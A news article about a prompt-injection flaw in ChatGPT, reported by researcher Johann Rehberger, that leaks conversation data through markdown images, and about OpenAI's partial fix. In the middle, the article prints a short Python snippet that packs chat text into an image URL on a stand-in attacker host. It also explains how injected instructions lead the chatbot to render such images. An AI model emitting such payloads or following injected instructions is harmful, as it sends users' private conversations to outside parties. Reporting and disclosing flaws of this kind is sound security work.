AI leader OpenAI has taken steps to address a data exfiltration vulnerability in ChatGPT, its popular AI chatbot.

However, despite efforts to mitigate the bug, security concerns persist: the fix is incomplete, and the risk remains unaddressed on some platforms.

Race Against Time For ChatGPT

(Photo: Mariia Shalabaieva from Unsplash)
Popular AI chatbot ChatGPT drew criticism over a data-leak flaw that attackers could exploit. OpenAI has since rolled out an admittedly "imperfect" solution to the problem.

Security researcher Johann Rehberger uncovered a data exfiltration technique in ChatGPT that could leak conversation details to an external URL.

Rehberger reported the flaw to OpenAI in April 2023, but the mitigation that eventually arrived was not foolproof, leaving room for exploitation under specific conditions.

Related Article: OpenAI Introduces Preparedness Framework to Make "AI Models Safe"

Delayed Response and Public Disclosure: Unveiling The Thief!

Despite the researcher's prompt disclosure, OpenAI's response lagged for months, and the issue was publicly disclosed on December 12, 2023.

In his demonstration, Rehberger introduced "The Thief!," a customized tic-tac-toe GPT that showcased the vulnerability by exfiltrating conversation data to an external URL.
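The underlying trick relies on how ChatGPT renders markdown images: a prompt-injected instruction can make the chatbot emit an image whose URL points at an attacker-controlled server, with conversation text smuggled into the query string. As a rough illustration only, with the attacker domain and parameter name invented for the example, such a payload could be assembled like this:

    import urllib.parse

    # Hypothetical attacker-controlled collection server (illustrative only)
    ATTACKER_ENDPOINT = "https://attacker.example/log"

    def build_exfil_image_markdown(conversation_snippet: str) -> str:
        """Pack conversation text into an image URL's query string."""
        payload = urllib.parse.quote(conversation_snippet)
        return f"![loading]({ATTACKER_ENDPOINT}?q={payload})"

    print(build_exfil_image_markdown("user said: my password is hunter2"))
    # ![loading](https://attacker.example/log?q=user%20said%3A%20my%20password%20is%20hunter2)

When the chat client fetches that "image," the attacker's server receives the request, and with it the encoded conversation data.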

Persistent Risks: Incomplete Fixes and Unprotected Platforms

According to Bleeping Computer, OpenAI's fix involves client-side checks via a validation API to prevent rendering images from unsafe URLs. However, the fix is incomplete: in some instances, ChatGPT still processes requests to arbitrary domains, so the leak remains possible.

"When the server returns an image tag with a hyperlink, there is now a ChatGPT client-side call to a validation API before deciding to display an image. Since ChatGPT is not open source and the fix is not via a Content-Security-Policy (that is visible and inspectable by users and researchers) the exact validation details are not known,"  Rehberger explains about the ChatGPT leak vulnerability.

The discrepancies observed during testing raise questions about the effectiveness of the implemented safety measures.

Unmitigated Threat on iOS: Security Gap in Mobile App

Crucially, the safety checks have not been extended to the iOS mobile app for ChatGPT, leaving the risk unaddressed on this platform. 

With no client-side validation call in place there, the potential for data exfiltration remains entirely unmitigated, posing a significant concern for iOS users.

While OpenAI has responded to the security issue, it remains unclear whether the fix has been implemented in the ChatGPT Android app.

With over 10 million downloads on Google Play, the uncertainty surrounding the Android app's status raises concerns about the security of a substantial user base.

Meanwhile, a new study says that AI models like ChatGPT are not capable of accurately analyzing SEC filings.

As per a Tech Times report last Dec. 20, the models produced inaccurate figures that appear nowhere in the actual SEC filings. To test this, the researchers prompted the models to see whether they would answer or refuse the question.

At that point, they found the responses unreliable, describing the AI models' performance as "absolutely unacceptable."

Read Also: Revolutionizing EU Integration: Albania Partners With ChatGPT Maker OpenAI to Speed AI Initiative

Joseph Henry
